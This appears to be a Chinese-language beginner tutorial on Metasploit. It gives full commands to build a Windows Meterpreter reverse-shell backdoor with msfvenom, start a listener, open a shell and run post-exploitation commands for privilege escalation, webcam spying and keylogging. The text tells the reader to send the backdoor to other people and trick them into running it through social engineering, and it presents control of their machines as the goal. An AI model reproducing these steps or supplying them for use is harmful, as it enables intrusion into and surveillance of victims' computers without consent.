Metasploit-初篇

Metasploit

metasploit 是一款开源的安全漏洞检测工具

 

渗透测试的操作系统

无需赘言，kali Linux发行版是目前最流行的安全操作系统;基于Debian的操作系统附带了600多个预安装的测试工具。这些多功能工具定期更新，可用于不同平台，如ARM和VMware。作为顶级黑客操作系统提供了一个实时引导功能，为漏洞检测提供了一个完美的环境。
下载Kali Linux：https://www.kali.org/downloads/

 

MS

先在kali上制作一个后门程序。文件名自定义.(后缀不能漏)：(名称).exe 

 

命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o openme.exe

 #本地监听地址及端口号：10.10.10.128：50000  

 为生成的文件 openme.exe 赋予可执行的权限，如果有必要可以对该文件执行免杀

 

命令：

chmod 777 openme.exe 

打开msf，加载exploit/multi/handler模块，同时设置本地主机地址，本地端口

 

命令：

msfconsole  

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 10.10.10.128

msf exploit(handler) > set lport 50000

开始执行渗透攻击并监听

 

命令：

 msf exploit(handler) > exploit -z -j

此时，你可以将文件发给其他人，利用社会工程学知识让别人在他的win7系统上打开该文件，那么你的目的就达到了

下面就是我在win7虚拟机中的文件，然后运行该文件

后门程序反向连接到msf，msf发起第二次攻击（开始渗透），然后客户端（后门程序）连接到服务端（msf）。

如图你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell，还有session信息。

 

命令：

msf exploit(handler) > sessions

msf exploit(handler) > sessions -i 1

meterpreter > shell

最后恭喜你就这样hacked别人的win7系统，如果你进一步学习Windows系统下的命令行操作，你就可以随意控制别人的主机了。

下面附上meterpreter常用的命令

getsystem        #会自动利用各种各样的系统漏洞来进行权限提升

migrate          #进程id进程迁移

background       #把当前的会话设置为背景，需要的时候在启用

getuid          #查看对方正在运行的用户

ps   #列出所有的进程

getpid      #返回运行meterpreter的id号

sysinfo       #产看系统信息和体系结构

shell    #切换到cmd的系统权限方式

exit   #退出shell会话返回meterpreter或终止meterpreter

getdesktop截取目标主机当前桌面会话窗口

run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头

keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘